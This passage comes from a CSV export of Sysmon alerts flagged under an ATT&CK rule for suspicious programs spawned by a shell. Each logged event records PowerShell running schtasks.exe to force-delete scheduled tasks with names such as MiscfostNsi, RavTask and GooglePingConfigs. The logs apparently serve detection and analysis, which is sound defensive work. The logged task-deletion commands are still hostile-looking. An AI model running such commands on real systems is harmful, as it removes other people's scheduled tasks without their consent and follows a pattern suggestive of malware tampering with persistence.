Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.780",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.723 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00106d0d2f00} +ProcessId: 4772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.729472800Z"",""eventRecordID"":""3575"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.723\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00106d0d2f00}\r\nProcessId: 4772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.723"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00106d0d2f00}"",""processId"":""4772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.645",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.652 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010630b2f00} +ProcessId: 6656 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.664903100Z"",""eventRecordID"":""3574"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.652\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010630b2f00}\r\nProcessId: 6656\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:08.652"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-0010630b2f00}"",""processId"":""6656"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.644",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.567 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001011092f00} +ProcessId: 6384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.573667100Z"",""eventRecordID"":""3573"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.567\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001011092f00}\r\nProcessId: 6384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.567"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001011092f00}"",""processId"":""6384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.643",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.460 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001039072f00} +ProcessId: 7948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: 
Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.486832400Z"",""eventRecordID"":""3572"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.460\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001039072f00}\r\nProcessId: 7948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 
0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.460"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001039072f00}"",""processId"":""7948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.585",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.220 +ProcessGuid: 
{df9fc3d3-b3f8-5ecf-0000-00103f052f00} +ProcessId: 6632 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.338231500Z"",""eventRecordID"":""3571"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.220\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00103f052f00}\r\nProcessId: 6632\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.220"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00103f052f00}"",""processId"":""6632"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.522",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.188 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ad032f00} +ProcessId: 7608 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.192600900Z"",""eventRecordID"":""3570"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.188\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ad032f00}\r\nProcessId: 7608\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.188"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-0010ad032f00}"",""processId"":""7608"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 